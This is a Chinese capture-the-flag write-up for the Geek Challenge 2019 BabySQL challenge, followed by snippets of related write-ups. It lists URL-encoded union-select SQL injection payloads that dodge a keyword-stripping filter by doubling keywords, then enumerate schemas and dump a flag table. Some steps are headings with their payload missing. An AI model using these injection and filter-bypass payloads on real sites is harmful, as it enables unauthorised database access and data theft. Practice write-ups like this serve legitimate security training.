極客大挑戰 2019 BabySQL

2022-05-19 12:40:39 字數 1773 閱讀 1070

開啟發現是登陸框,先嘗試下二次注入

admin'# 123456 ,登陸成功,獲取密碼,但是不知道下一步如何利用。

再嘗試正常注入

union select查詢,發現無法顯示其內容,猜測被替換為空。使用union/**/select,只留下//,再次證實被替換為空,嘗試雙寫繞過ununionion seselectlect,發現回顯出union select,即可進行下一步操作

發現爆出回顯位,2,3.

把database(),放在回顯位中,爆出資料庫geek。繼續使用下乙個payload,發現無法打過去,報錯。考慮還有其他的字串進行了替換為空過濾,fuzz發現,from,or,where也進行了過濾。同樣雙寫繞過過濾

爆表名:

爆列名:

?username=admin&password=123 %27%20ununionion%20seselectlect%201,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='geekuser' %23

感覺沒什麼用,猜測不在這個資料庫中,爆出所有資料庫

爆資料庫:

猜測在ctf庫下,重新爆

爆表名:

?username=admin&password=123 %27%20ununionion%20seselectlect%201,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf' %23

爆出flag表

爆列名:

?username=admin&password=123 %27%20ununionion%20seselectlect%201,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='flag' %23

爆出flag列

爆欄位:

?username=admin&password=123 %27%20ununionion selselectect 1,2,group_concat(flag) frfromom (ctf.flag) %23

爆出flag內容

核心思路:

極客大挑戰 2019 PHP

開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...

極客大挑戰 2019 HardSQL wp

有過濾,抓個包fuzz一下 等號,空格等被過濾 發現可以用報錯注入,空格可以用括號代替 查表名username admin or extractvalue 1,concat 0x7e,select group concat column name from information schema.co...

極客大挑戰 2019 PHP

剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...